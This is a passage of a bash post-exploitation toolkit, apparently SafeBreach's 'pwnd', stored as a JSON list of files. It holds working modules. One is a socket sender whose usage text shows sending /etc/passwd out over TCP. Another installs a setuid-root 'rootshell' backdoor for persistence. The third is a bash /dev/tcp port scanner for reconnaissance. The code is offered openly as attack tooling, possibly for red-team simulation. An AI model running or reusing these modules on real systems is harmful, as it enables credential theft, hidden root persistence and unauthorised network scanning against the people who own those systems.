localhost at port 80 TCP and will send over\n the content of `/etc/passwd'\nEOF\n return 0\n}\n\n\nover_socket() {\n local host proto port\n\n if [ \"${1-}\" == \"-u\" ]; then\n if [ -z \"${3-}\" ]; then\n \t __over_socket_usage\n return 0\n fi\n host=\"$2\"\n proto=\"udp\"\n port=\"$3\"\n else\n if [ -z \"${2-}\" ]; then\n __over_socket_usage\n return 0\n fi\n proto=\"tcp\"\n port=\"$2\"\n host=\"$1\"\n fi\n\n cat /dev/stdin > \"/dev/$proto/$host/$port\"\n}\n\npwnd_register_cmd over_socket \"A simple yet \\\"cross platform\\\" implementation of generic TCP and UDP socket using bash sockets\"\n" }, { "path": "pwnd/persistence/rootshell.bash", "content": "###########################################################################\n# #\n# Copyright (c) 2016, SafeBreach #\n# All rights reserved. #\n# #\n# Redistribution and use in source and binary forms, with or without #\n# modification, are permitted provided that the following conditions are #\n# met: #\n# #\n# 1. Redistributions of source code must retain the above #\n# copyright notice, this list of conditions and the following #\n# disclaimer. #\n# #\n# 2. Redistributions in binary form must reproduce the #\n# above copyright notice, this list of conditions and the following #\n# disclaimer in the documentation and/or other materials provided with #\n# the distribution. #\n# #\n# 3. Neither the name of the copyright holder #\n# nor the names of its contributors may be used to endorse or promote #\n# products derived from this software without specific prior written #\n# permission. #\n# #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #\n# #\n###########################################################################\n\n# rootshell, A simple yet \"cross platform\" implementation of rootshell using `chmod u+s' and bash\n\n__install_rootshell_usage() {\n cat << \"EOF\"\nusage: install_rootshell [/path/to/shell] [/path/to/rootshell]\n A simple yet \"cross platform\" implementation of rootshell using chmod and\n bash. /PATH/TO/SHELL is a path to shell (default: $SHELL). /PATH/TO/ROOTSHELL\n is path to where to install the rootshell (default: mktemp -u)\nEOF\n return 0\n}\n\n\ninstall_rootshell() {\n pwnd_isroot || return 1\n\n local shellfile=${1-$SHELL}\n local rootshell=${2-$(mktemp -u)}\n\n cp \"$shellfile\" \"$rootshell\"\n chmod u+s \"$rootshell\"\n ls -la \"$rootshell\"\n}\n\npwnd_register_cmd install_rootshell \"A simple yet \\\"cross platform\\\" implementation of rootshell using \\`chmod u+s' and bash\"\n" }, { "path": "pwnd/reconnaissance/portscanner.bash", "content": "###########################################################################\n# #\n# Copyright (c) 2016, SafeBreach #\n# All rights reserved. #\n# #\n# Redistribution and use in source and binary forms, with or without #\n# modification, are permitted provided that the following conditions are #\n# met: #\n# #\n# 1. Redistributions of source code must retain the above #\n# copyright notice, this list of conditions and the following #\n# disclaimer. #\n# #\n# 2. Redistributions in binary form must reproduce the #\n# above copyright notice, this list of conditions and the following #\n# disclaimer in the documentation and/or other materials provided with #\n# the distribution. #\n# #\n# 3. Neither the name of the copyright holder #\n# nor the names of its contributors may be used to endorse or promote #\n# products derived from this software without specific prior written #\n# permission. #\n# #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #\n# #\n###########################################################################\n\n# portscanner, A simple yet \"cross platform\" implementation of TCP and UDP port scanner using bash sockets\n\n__portscanner_usage() {\n cat << \"EOF\"\nusage: portscanner host [port/proto ...], [port-range/proto ...]>\n A simple yet \"cross platform\" implementation of portscanner using bash\n sockets. HOST can be IPv4 address or hostname. PORT can be any port number.\n PROTO can be `tcp' or `udp'. PORTS is comma-seperated PORTs. PORT-RANGE is\n any range between 1 to 65535 following `/tcp' or `/udp' postfix.\n\n Examples:\n\n $ portscanner localhost 80/tcp\n\n This will check if TCP port 80 is open on localhost.\n\n $ portscanner localhost 53/tcp,53/udp\n\n This will check if TCP port 53 and UDP port 53 are opened on localhost.\n\n $ portscanner localhost 1-1024/tcp,69/udp\n\n This will check if TCP ports 1 to 1024 are opened and if UDP port 69\n is opened on localhost.\nEOF\n return 0\n}\n\n# TODO: Add alternative implementations for `timeout'-like functionality\n\n__portscanner_timeout() {\n # Based on: http://stackoverflow.com/questions/601543/command-line-command-to-auto-kill-a-command-after-a-certain-amount-of-time\n `perl -e 'alarm shift; open STDERR, \"> /dev/null\"; exec @ARGV' \"$@\"`\n # `` works better than $() in Linux when it comes to supressing 'Alarm' message _AND_ still having alarm terminating the process\n}\n\n# Based on http://www.catonmat.net/blog/tcp-port-scanner-in-bash/\n\nportscanner() {\n if [ -z \"${2-}\" ]; then\n __portscanner_usage\n return\n fi\n\n local host=\"$1\"\n local ports=()\n local csv_args=()\n\n IFS=',' read -ra csv_args <<< \"${@:2}\"\n\n for arg in \"${csv_args[@]}\"; do\n case \"$arg\" in\n *-*)\n # i.e. 1-1024/tc\n local range_ports=()\n IFS='/' read -ra range_ports <<< \"$arg\"\n IFS='-' read start end <<< \"${range_ports[0]}\"\n for ((port=start; port <= end; port++)); do\n ports+=(\"$port/${range_ports[1]}\")\n done\n ;;\n *,*)\n # i.e. '53/tcp, 53/udp'\n IFS=',' read -ra ports <<< \"$arg\"\n ;;\n *)\n # i.e. '80/tcp'\n ports+=(\"$arg\")\n ;;\n esac\n done\n\n for port in \"${ports[@]}\"; do\n local conn_parameter=()\n IFS='/' read -ra conn_parameter <<< \"$port\"\n __portscanner_timeout 1 \"echo >/dev/${conn_parameter[1]}/$host/${conn_parameter[0]}\" &&\n echo \"port $port is open\" ||\n echo \"port $port is closed\"\n done\n\n}\n\npwnd_register_cmd portscanner \"A simple yet \\\"cross platform\\\" implementation of TCP and UDP port scanner using bash sockets\"\n" } ]